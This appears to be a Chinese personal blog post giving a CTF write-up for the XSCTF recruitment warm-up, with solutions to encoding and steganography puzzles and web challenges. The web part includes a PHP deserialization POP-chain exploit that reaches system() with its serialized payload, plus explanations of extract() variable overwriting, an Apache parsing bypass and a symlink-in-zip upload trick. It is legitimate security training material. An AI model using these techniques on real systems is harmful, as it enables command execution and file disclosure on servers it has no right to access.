<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.2.0">
<script>
(function(){
    if(''){
        if (prompt('请输入文章密码') !== ''){
            alert('密码错误！');
            history.back();
        }
    }
})();
</script>
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/aixin.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/aixin.png">
  <link rel="mask-icon" href="/images/aixin.png" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="//img.hzy2003628.top/busuanzi/jquery.fancybox.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-big-counter.min.css">
  <script src="true"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"hzy2003628.top","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"flat"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":true,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":"valine","storage":true,"lazyload":false,"nav":null,"activeClass":"valine"},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":-1,"unescape":false,"preload":true},"motion":{"enable":false,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideLeftIn"}},"path":"search.xml"};
  </script>



<script>
(function(){
var src = "https://s.ssl.qhres2.com/ssl/ab77b6ea7f3fbf79.js";
document.write('<script src="' + src + '" id="sozz"><\/script>');
})();
</script>




<!-- title、keywords、desc关键字 -->

  <title>微言</title>
  <meta name="title" content="微言" />






 <script>(function(i,s,o,g,r,a,m){i["DaoVoiceObject"]=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;a.charset="utf-8";m.parentNode.insertBefore(a,m)})(window,document,"script",('https:' == document.location.protocol ? 'https:' : 'http:') + "//widget.daovoice.io/widget/b6dbddb6.js","daovoice")
 daovoice('init', {
  app_id: "6f081c2c"
});
daovoice('update');
 </script>
 





<!-- 春节灯笼代码段 -->
<div id="lantern-wrapper" class="lantern-wrapper" no-select></div>
<script src="http://img.hzy2003628.top/busuanzi/lantern.min.js"></script>
<script>
    let lantern = new Lantern('lantern-wrapper', {
        date: {								// 日期格式：'月-日'
            from: '12-20',					// 开始悬挂灯笼的日期
            to: '1-31'						// 结束悬挂灯笼的日期
        },
        postion: {
            zIndex: 9999,					// 整个灯笼的 z-index 属性
            lanternRL: [10, 150, 150, 10],	// 灯笼距离边界的距离：左侧灯笼距离左边的距离，右侧登录距离右侧的距离；页面灯笼从左往右依次设置
            lanternTop: 0					// 灯笼距离顶部的距离。你也可以使用数组从左往右依次设置每个灯笼的距顶距离，例如：[0, 100, 200, 300]
        },
        content: '新春快乐'					 // 灯笼内显示的文字，只会截取前四个字符
    });
</script>


  <meta property="og:type" content="article">
<meta property="og:title" content="XSCTF联合招新赛（热身赛）">
<meta property="og:url" content="https://hzy2003628.top/2022/10/21/XSCTF%20%E8%81%94%E5%90%88%E6%8B%9B%E6%96%B0%E8%B5%9B(%E7%83%AD%E8%BA%AB%E8%B5%9B%EF%BC%89/index.html">
<meta property="og:site_name" content="风尘孤狼">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210212101670.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210212059176.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210181737151.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210181759136.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210191904589.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210211715685.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210211731791.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210211731981.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210181741704.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210181742846.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210201323294.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210201324481.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210182008773.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210211401428.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210201339867.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210201340120.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210201342096.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210211716794.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210211719594.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210211720155.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210211701610.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210211702337.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210211703531.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210211705241.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210211705975.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210212033006.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210212034581.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210212034732.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210211402159.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210211410965.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210211411208.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210181816411.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210211335516.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210212128126.png?x-oss-process=hzy">
<meta property="og:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210212129334.png?x-oss-process=hzy">
<meta property="article:published_time" content="2022-10-21T13:27:31.000Z">
<meta property="article:modified_time" content="2022-10-21T13:36:49.337Z">
<meta property="article:author" content="故里">
<meta property="article:tag" content="赛后复盘">
<meta property="article:tag" content="CTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210212101670.png?x-oss-process=hzy">

<link rel="canonical" href="https://hzy2003628.top/2022/10/21/XSCTF%20%E8%81%94%E5%90%88%E6%8B%9B%E6%96%B0%E8%B5%9B(%E7%83%AD%E8%BA%AB%E8%B5%9B%EF%BC%89/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>



  <title>XSCTF联合招新赛（热身赛） | 风尘孤狼</title>
  


  <script data-pjax>
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?d1ea9671a278a2cb33e24c76d08af22f";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">

<!-- 加入APlayer音乐播放器 -->
<link rel="stylesheet" href="/dist/APlayer.min.css">
<div id="aplayer"></div>
<script type="text/javascript" src="/dist/APlayer.min.js"></script>
<script type="text/javascript" src="/dist/music.js"></script>

  <div class="container">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">风尘孤狼</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">知识型学习记录</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签<span class="badge">38</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类<span class="badge">18</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">100</span></a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-links">

    <a href="/links/" rel="section"><i class="fa fa-link fa-fw"></i>友链</a>

  </li>
        <li class="menu-item menu-item-love">

    <a href="/Love/" rel="section"><i class="fa fa-heartbeat fa-fw"></i>Love</a>

  </li>
        <li class="menu-item menu-item-loveshow">

    <a href="/LoveShow/" rel="section"><i class="fa fa-heartbeat fa-fw"></i>LoveShow</a>

  </li>
        <li class="menu-item menu-item-whisper">

    <a href="/Whisper/" rel="section"><i class="fa fa-calendar fa-fw"></i>微言</a>

  </li>
        <li class="menu-item menu-item-guestbook">

    <a href="/guestbook/" rel="section"><i class="fa fa-book fa-fw"></i>留言板</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>




    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://hzy2003628.top/2022/10/21/XSCTF%20%E8%81%94%E5%90%88%E6%8B%9B%E6%96%B0%E8%B5%9B(%E7%83%AD%E8%BA%AB%E8%B5%9B%EF%BC%89/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="故里">
      <meta itemprop="description" content="没有所谓失败，除非你不再尝试">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="风尘孤狼">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          XSCTF联合招新赛（热身赛）
        </h1>

        <div class="post-meta">  
		 
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2022-10-21 21:27:31 / 修改时间：21:36:49" itemprop="dateCreated datePublished" datetime="2022-10-21T21:27:31+08:00">2022-10-21</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E8%B5%9B%E5%90%8E%E5%A4%8D%E7%9B%98/" itemprop="url" rel="index"><span itemprop="name">赛后复盘</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a>
                </span>
            </span>

          
            <span id="/2022/10/21/XSCTF%20%E8%81%94%E5%90%88%E6%8B%9B%E6%96%B0%E8%B5%9B(%E7%83%AD%E8%BA%AB%E8%B5%9B%EF%BC%89/" class="post-meta-item leancloud_visitors" data-flag-title="XSCTF联合招新赛（热身赛）" title="阅读次数">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span class="leancloud-visitors-count"></span>
            </span>
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="far fa-comment"></i>
      </span>
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/2022/10/21/XSCTF%20%E8%81%94%E5%90%88%E6%8B%9B%E6%96%B0%E8%B5%9B(%E7%83%AD%E8%BA%AB%E8%B5%9B%EF%BC%89/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2022/10/21/XSCTF%20%E8%81%94%E5%90%88%E6%8B%9B%E6%96%B0%E8%B5%9B(%E7%83%AD%E8%BA%AB%E8%B5%9B%EF%BC%89/" itemprop="commentCount"></span>
    </a>
  </span>
  
  <br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>12k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>11 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210212101670.png?x-oss-process=hzy" alt="image-20221021205911855"></p>
<span id="more"></span>
<hr>
<h1 id="xsctf-联合招新赛热身赛">XSCTF 联合招新赛（热身赛）</h1>
<h1 id="前言">前言</h1>
<p>三天，15名，菜菜菜！！！</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210212059176.png?x-oss-process=hzy" alt="image-20221021205911855"></p>
<h1 id="misc">MISC</h1>
<h2 id="b45364">B45364</h2>
<blockquote>
<p>WVVoT2FtUkhXamRoUmxVeFRtcHNUMXBHT1V4aFYyeDVXVmRHUTJKSGVGTlpXREJMQ2c9PQo=</p>
</blockquote>
<p>解码几次得到flag</p>
<p>hsctf{hU569Nd_KiiraaBllRa}</p>
<h2 id="phone_call">phone_call</h2>
<blockquote>
<p>陈队给你打了个电话，让你永远要相信Ta。</p>
</blockquote>
<p>俩个附件</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210181737151.png?x-oss-process=hzy" alt="image-20221018173635634"></p>
<p>浅浅听了一下，发现音频是九键手机按键音，直接DTMF工具识别</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210181759136.png?x-oss-process=hzy" alt="image-20221018175905054"></p>
<p>133562619159396</p>
<p>解压得到flag</p>
<p>flag = ‘HSCTF{Y0ong_Yu4n_X1an9_X1n_Ch3n_Du!}’</p>
<h2 id="鸠-打-电-话">鸠 打 电 话</h2>
<blockquote>
<p>鸠在给可恶的出题人打电话控诉题目太折磨，但由于出题人电话实在太太太难记了打了整整四遍才打对电话。</p>
<p>这个可恶的出题人居然还把电话拿来加密flag的压缩包了！罪大恶极！！！</p>
<p>Clue 1：BV1z64y1S7SR</p>
<p>Clue 2：最长的那段才是打通了的电话</p>
</blockquote>
<p>什么鬼话，理解不了，手机号直接爆破算了</p>
<p>五分钟，，waiting。。。。。。</p>
<h2 id="阳间题">阳间题</h2>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210191904589.png?x-oss-process=hzy" alt="image-20221019190354125"></p>
<pre><code class="hljs plaintext">3207357975641587136122466514425152961654613410728337142271750273124995105747053991640817066352343657398947248938255086358418100814441196784643527787764297</code></pre>
<p>好吧，其实是这样的，010打开中文因为编码问题显示异常</p>
<pre><code class="hljs plaintext">艾尔登法环正式发售在即，迫不及待的mjj身上好像有蚂蚁在爬，写下了一句谜语：
3207357975641587136122466514425152961654613410728337142271750273124995105747053991640817066352343657398947248938255086358418100814441196784643527787764297
谜底就是flag，也是他给所有新生的祝福，希望大家享受解码的过程。</code></pre>
<p>十进制转十六进制再转str</p>
<pre><code class="hljs plaintext">====Q6BGST3OHYFM7CZATPBODT4CH2MN7CN6VZAOZ3XGHY4K7K5ADGNPESUCUIZI</code></pre>
<pre><code class="hljs plaintext">IZIUCUSEPNGDA5K7K4YHGX3ZOAZV6NC7NM2HC4TDOBPTAZC7MFYHO3TSGB6Q====</code></pre>
<p>逆序输出base32解码再凯撒爆破得到flag</p>
<pre><code class="hljs plaintext">FQARD&#123;L0u_W0s_yp3_4_k4qrcp_0d_apwnr0&#125;
HSCTF&#123;N0w_Y0u_ar3_4_m4ster_0f_crypt0&#125;</code></pre>
<h2 id="一个小彩蛋">一个小彩蛋！</h2>
<blockquote>
<p>听说只有聪明人才能看到这个彩蛋！</p>
<p>那能看到的你一定也是聪明人吧！</p>
<p>那聪明人一定已经拿到了Misc方向的B45364Reverse方向的2^11Crypto方向的二元一次方程组Web方向的头头是道PWN方向的babystack……的flag了吧！</p>
<p>那就来领取你的奖励吧！</p>
<p>把五个flag大括号包裹的内容按顺序相连最后塞进&quot;hsctf{}&quot;里就是这个彩蛋的flag哟~</p>
<p>（不会吧不会吧，不会这都有聪明人不知道要交hsctf{flag1+flag2+flag3+flag4+flag5}并且没有&quot;+&quot;的flag吧）</p>
</blockquote>
<p>hsctf{hU569Nd_KiiraaBllRaE1d3sTBrOth3r_CaR0IlikouleDl3F4TH3rRR4iin_AvAvAMast3rH0ssssT_dI@nQQBAdvV0mQn_QuE3nkun}</p>
<h2 id="image1">image1</h2>
<blockquote>
<p>图片隐写</p>
</blockquote>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210211715685.png?x-oss-process=hzy" alt="image-20221021171510619"></p>
<p>flag{d2c3e80c-7687-4aae-8f90-70e43df97b6f}</p>
<h2 id="image2">image2</h2>
<p>还是图片隐写，010打开即可</p>
<p>flag{5eafbba3-f710-4fcc-9045-0b0a8b581ec5}</p>
<h2 id="image3">image3</h2>
<p>修改宽高，还是打开010</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210211731791.png?x-oss-process=hzy" alt="image-20221021173115701"></p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210211731981.png?x-oss-process=hzy" alt="image-20221021173122802"></p>
<p>flag{2c44e767-e9b4-4b55-b75e-3504b515942f}</p>
<h2 id="image4">image4</h2>
<p>改成压缩包得到flag</p>
<p>flag{3f0283e0-e5d0-4084-816b-1237718a8630}</p>
<h1 id="web">WEB</h1>
<h2 id="头头是道">头头是道</h2>
<p>看header</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210181741704.png?x-oss-process=hzy" alt="image-20221018174133631"></p>
<p>hsctf{Mast3rH0ssssT_dI@nQQ}</p>
<h2 id="warm_up">warm_up</h2>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210181742846.png?x-oss-process=hzy" alt="image-20221018174222722"></p>
<p>考察XFF</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210201323294.png?x-oss-process=hzy" alt="image-20221020132316151"></p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210201324481.png?x-oss-process=hzy" alt="image-20221020132430382"></p>
<p>Flag: hsctf{he1_hei_ran_r@n_w0_d3_rAn_Ran_00000000}</p>
<h2 id="ezser">ezser</h2>
<blockquote>
<p>魔术方法是什么东西捏？</p>
</blockquote>
<p>基础pop chain</p>
<p>exp如下</p>
<pre><code class="hljs plaintext">&lt;?php
class Fxizenta&#123;
    public $b;
    public function __call($method,$attributes)
    &#123;
        $this-&gt;sayhi();
    &#125;
    public function sayhi()
    &#123;
        echo &quot;It&#x27;s reversed! ctfer don&#x27;t need girlfriend&quot;.$this-&gt;b;
    &#125;

&#125;
class Need&#123;
    public $cmd ;
    public function __toString()
    &#123;
        return system($this-&gt;cmd);  //backdoor
    &#125;
&#125;

class girlfriend&#123;
    public $a;
    public function __destruct()
    &#123;
        $this-&gt;a-&gt;meeting();
    &#125;
&#125;

$h = new Fxizenta();
$z = new Need();
$z -&gt;cmd = &#x27;cat flag.php&#x27;;
$y = new girlfriend();
$y -&gt;a = $h;
$h -&gt;b = $z;

echo serialize($y);


?&gt;</code></pre>
<pre><code class="hljs plaintext">O:10:&quot;girlfriend&quot;:1:&#123;s:1:&quot;a&quot;;O:8:&quot;Fxizenta&quot;:1:&#123;s:1:&quot;b&quot;;O:4:&quot;Need&quot;:1:&#123;s:3:&quot;cmd&quot;;s:12:&quot;cat flag.php&quot;;&#125;&#125;&#125;</code></pre>
<p>flag在源码</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210182008773.png?x-oss-process=hzy" alt="image-20221018200857673"></p>
<p>flag{ctfer_d0nt_need_grilfriend}</p>
<h2 id="ezphp">EZphp</h2>
<blockquote>
<p>我得想想怎么才能取而代之</p>
</blockquote>
<p>题目如下</p>
<pre><code class="hljs plaintext">&lt;?php
include &#x27;flag.php&#x27;;
extract($_GET);
if (isset($wsf)) &#123;
    $xmm = trim(file_get_contents($zm));
    if ($xmm == $wsf) &#123;
        if (!empty($xlq)) &#123;
            $xw = trim(file_get_contents($fn));
            if ($xlq === $xw) &#123;

                echo &quot;&lt;p&gt;$flag&lt;/p&gt;&quot;;
            &#125; else &#123;
                echo &#x27;&lt;p&gt;no no no &lt;/p&gt;&#x27;;
            &#125;
        &#125; else &#x27;You cant do that!!&#x27;;
    &#125; else &#123;
        echo &#x27;hacker!!&#x27;;
    &#125;
&#125; else &#123;
    highlight_file(__FILE__);
&#125;
?&gt;</code></pre>
<p>考察了两个地方，第一个是变量覆盖，第二个就是伪协议读取</p>
<blockquote>
<p>extract() 函数从<a target="_blank" rel="noopener" href="https://so.csdn.net/so/search?q=%E6%95%B0%E7%BB%84&amp;spm=1001.2101.3001.7020">数组</a>中将变量导入到当前的符号表。</p>
<p>该函数使用数组键名作为变量名，使用数组键值作为变量值。针对数组中的每个元素，将在当前符号表中创建对应的一个变量。</p>
</blockquote>
<p>这道题目是两道原题合到一块了，那两道题目在这</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_32642035/article/details/104747801">(68条消息) web8–php函数extract（）、file_get_contents（）、trim（）_line_uc的博客-CSDN博客_php的函数trim(file_get_contents($zm))</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_42777804/article/details/90414002">(68条消息) bugku ctf 代码审计 extract变量覆盖_就是217的博客-CSDN博客_$content=trim(file_get_contents($file))</a></p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210211401428.png?x-oss-process=hzy" alt="image-20221021140113342"></p>
<p>flag{phP_lS_th9_be5T_l4ngUa9e}</p>
<h2 id="updater">updater</h2>
<blockquote>
<p>the fireware need to update now</p>
</blockquote>
<p>发现只能上传zip</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210201339867.png?x-oss-process=hzy" alt="image-20221020133928389"></p>
<p>上传之后放到uploads文件夹下，并且文件名随机hash</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210201340120.png?x-oss-process=hzy" alt="image-20221020134000028"></p>
<p>原题改的</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/AAAAAAAAAAAA66/article/details/121217024">(67条消息) i春秋-ctf 文件上传_AAAAAAAAAAAA66的博客-CSDN博客_ctf上传文件</a></p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210201342096.png?x-oss-process=hzy" alt="image-20221020134205026"></p>
<p>apache具有解析漏洞</p>
<blockquote>
<p>apache解析漏洞即遇到无法解析的后缀名就会向前解析</p>
<p>eg:  h.php.aaa  会先解析aaa，无法解析后解析php</p>
<p>这样就可以绕过zip解压上传php文件了</p>
</blockquote>
<p>后面就是跟上面那个原题解法差不多了</p>
<p>…/…/…/…/1.php.abc</p>
<p>but试了不行，发现说的gorget the readme，<a target="_blank" rel="noopener" href="http://xn--readme-vi6jl20hvfb348vi1m.md">软链接指向readme.md</a>,制作个压缩包</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210211716794.png?x-oss-process=hzy" alt="image-20221021171643716"></p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210211719594.png?x-oss-process=hzy" alt="image-20221021171947477"></p>
<p>上传之后得到</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210211720155.png?x-oss-process=hzy" alt="image-20221021172055069"></p>
<p>hsctf{sP4ce.bi1ibiLi。Conn/672328O9a}</p>
<h2 id="babyxss">babyxss</h2>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210211701610.png?x-oss-process=hzy" alt="image-20221021170152095"></p>
<p>随便提交就会显示</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210211702337.png?x-oss-process=hzy" alt="image-20221021170210236"></p>
<p>dir扫，发现其他路由—admin</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210211703531.png?x-oss-process=hzy" alt="image-20221021170308422"></p>
<p>发现是一个可以实现查看提交的功能</p>
<p>提交了一个</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210211705241.png?x-oss-process=hzy" alt="image-20221021170523155"></p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210211705975.png?x-oss-process=hzy" alt="image-20221021170527886"></p>
<p>出不来flag，check前面的别人传的，发现是下面这样的</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210212033006.png?x-oss-process=hzy" alt="image-20221021203302881"></p>
<p>改一下ip和端口成自己的，然后提交之后check一下再一刷新就弹出来flag了</p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210212034581.png?x-oss-process=hzy" alt="image-20221021203438508"></p>
<p><img src="https://imagesssssssssss.oss-cn-beijing.aliyuncs.com/img/202210212034732.png?x-oss-process=hzy" alt="image-20221021203401659"></p>
